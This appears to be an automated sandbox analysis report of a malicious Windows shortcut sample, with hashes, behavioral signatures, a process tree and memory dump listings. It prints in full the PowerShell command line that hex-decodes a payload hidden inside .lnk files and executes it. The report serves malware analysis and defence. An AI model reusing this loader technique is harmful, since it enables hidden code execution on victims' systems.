Analysis
max time kernel: 117s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 02-04-2024 07:10
Static task: static1
Behavioral task: behavioral1
  Sample: 85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
  Resource: win10v2004-20240226-en
General
Target: 85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
Size: 5.4MB
MD5: 85e44c6e99f5f4043fc2c993b6fa633b
SHA1: 21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
SHA256: 62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
SHA512: 7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
SSDEEP: 1536:U9I0i/p6qP3NUUSQryt/H7brkIYtppz5h5Z5S5k5+5L5XEYEpEz5d5zE/EVE/E/A:U94
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    2536  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2536  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                       pid   process  target process
    PID 1548 wrote to memory of 2536  1548  cmd.exe  powershell.exe
    PID 1548 wrote to memory of 2536  1548  cmd.exe  powershell.exe
    PID 1548 wrote to memory of 2536  1548  cmd.exe  powershell.exe
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\85e44c6e99f5f4043fc2c993b6fa633b_JaffaCakes118.lnk
   - Suspicious use of WriteProcessMemory
   2. C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      Command line: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
memory/2536-38-0x000000001B1B0000-0x000000001B492000-memory.dmp  Filesize: 2.9MB
memory/2536-39-0x0000000002380000-0x0000000002388000-memory.dmp  Filesize: 32KB
memory/2536-40-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmp  Filesize: 9.6MB
memory/2536-41-0x00000000025D0000-0x0000000002650000-memory.dmp  Filesize: 512KB
memory/2536-42-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmp  Filesize: 9.6MB
memory/2536-45-0x00000000025D0000-0x0000000002650000-memory.dmp  Filesize: 512KB
memory/2536-44-0x00000000025D0000-0x0000000002650000-memory.dmp  Filesize: 512KB
memory/2536-43-0x00000000025D0000-0x0000000002650000-memory.dmp  Filesize: 512KB
memory/2536-46-0x00000000025D0000-0x0000000002650000-memory.dmp  Filesize: 512KB
memory/2536-47-0x000007FEF4F50000-0x000007FEF58ED000-memory.dmp  Filesize: 9.6MB